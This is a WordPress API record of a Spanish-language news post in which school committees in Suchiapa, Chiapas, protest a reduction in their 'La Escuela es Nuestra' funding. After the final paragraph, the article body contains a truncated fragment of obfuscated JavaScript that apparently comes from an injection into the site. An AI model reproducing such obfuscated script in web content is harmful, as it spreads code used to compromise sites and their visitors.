{"id":21622,"date":"2025-04-28T04:12:11","date_gmt":"2025-04-28T04:12:11","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21622"},"modified":"2025-04-28T04:12:11","modified_gmt":"2025-04-28T04:12:11","slug":"exigen-que-la-direccion-de-educacion-media-no-intervenir-en-el-programa-la-escuela-es-nuestra","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21622","title":{"rendered":"Exigen que la direcci\u00f3n de educaci\u00f3n media no intervenir en el programa La Escuela es Nuestra"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0018-1024x768.jpg\" alt=\"\" class=\"wp-image-21623\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0018-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0018-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0018-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250427-WA0018.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><br>27 de abril del 2025. Tuxtla Guti\u00e9rrez.- Docentes dan a conocer que el pasado jueves 17 de abril fueron convocados por el director de la Preparatoria Juan Sabines<br>Guti\u00e9rrez, ubicado en Suchiapa, Chiapas, como parte del comit\u00e9 que fueron elegidos por la asamblea en el programa la Escuela es nuestra.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>Sin embargo grande fue nuestra sorpresa al ver que alrededor de 12 personas de la secretar\u00eda de Educaci\u00f3n de la direcci\u00f3n media enviados por el director del nivel el  Jos\u00e9 Adri\u00e1n Brindis Bautista, se encontraban en una supuesta \u201crevisi\u00f3n\u201d a los estados financieros de la preparatoria, a lo cuales fuimos tambi\u00e9n interrogados<br>por dicho personal pregunt\u00e1ndonos nuestros nombres, cargos y en que \u00edbamos a utilizar el recurso, a lo que contestamos que es una decisi\u00f3n de asamblea, direcci\u00f3n de la escuela y comit\u00e9s, y que la cantidad de un mill\u00f3n y medio servir\u00eda para atender las necesidades de la escuela.<\/p>\n\n\n\n<p>Al siguiente d\u00eda realizaron la asamblea de padres de familia, donde el director indic\u00f3 las prioridades en conjunto con el comit\u00e9 de padres de familia y el comit\u00e9 de la escuela es nuestra a fin de que todos estuvi\u00e9ramos de acuerdo y transparentar el recurso que nos har\u00e1n llegar, y en asamblea decidimos ir a la direcci\u00f3n de educaci\u00f3n media a exponer nuestras inquietudes al director del nivel el Jos\u00e9 Adri\u00e1n Brindis, el cual no pudo recibirnos y nos atendi\u00f3 su particular<br>el Licenciado Ortiz quien nos coment\u00f3 que ya estaban enterados de la situaci\u00f3n y que recibir\u00edamos el mill\u00f3n de pesos, a lo que expusimos que no se trataba de esa cantidad que realmente recibiremos<br>un mill\u00f3n y medio como lo establece la normatividad del programa por ser una escuela de mas de mil alumnos, pedimos que nos agende una fecha con el director, pero hasta el d\u00eda de hoy que presentamos nuestra queja no se han dignado de llamarnos o creen que no podemos llevar a los padres de familia, por lo que exigimos Dr. Roger Adri\u00e1n Mandujano Ayala, que no se maneje una doble comunicaci\u00f3n o quien quiere salir beneficiado con el medio mill\u00f3n que no reportaron.<br><\/p>\n\n\n\n<p>Hemos trabajado bien de la mano con el actual director de la preparatoria, nos gusta porque ha transparentado todos los recursos que llega, incluso cuando la anterior directora no nos participaba de nada, este director ha dado a conocer lo que recibe de cafeter\u00edas, lo que llega de<br>reembolso de luz el\u00e9ctrica e incluso todo lo referente al campo nos participa, por lo que exigimos al secretario de educaci\u00f3n Roger Adri\u00e1n Mandujano Ayala, que nos deje trabajar ambos comit\u00e9s con el actual director quien ya est\u00e1 a un a\u00f1o de terminar su per\u00edodo y si es necesario llevar a los padres de familia de Suchiapa, ah\u00ed estamos puestos, aun cuando tengamos que pagar<br>nuestro pasaje para lo que se requiera&#8221;, expresaron.<br><\/p>\n\n\n\n<p>&#8220;El d\u00eda martes 29 de abril iremos a hacer una nueva visita a la direcci\u00f3n de educaci\u00f3n media, una representaci\u00f3n de padres de familia a ver si nos pueden atender y dejar bien en claro nuestra postura&#8221;, expres\u00f3 el Comit\u00e9 de la escuela es nuestra y comit\u00e9 de padres de familia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>27 de abril del 2025. Tuxtla Guti\u00e9rrez.- Docentes dan a conocer que el pasado jueves 17 de abril fueron convocados por el director de la Preparatoria Juan SabinesGuti\u00e9rrez, ubicado en Suchiapa, Chiapas, como parte del comit\u00e9 que fueron elegidos por la asamblea en el programa la Escuela es nuestra. Sin embargo grande fue nuestra sorpresa &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21623,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21622","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21622","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21622"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21622\/revisions"}],"predecessor-version":[{"id":21624,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21622\/revisions\/21624"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21623"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21622"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21622"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21622"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}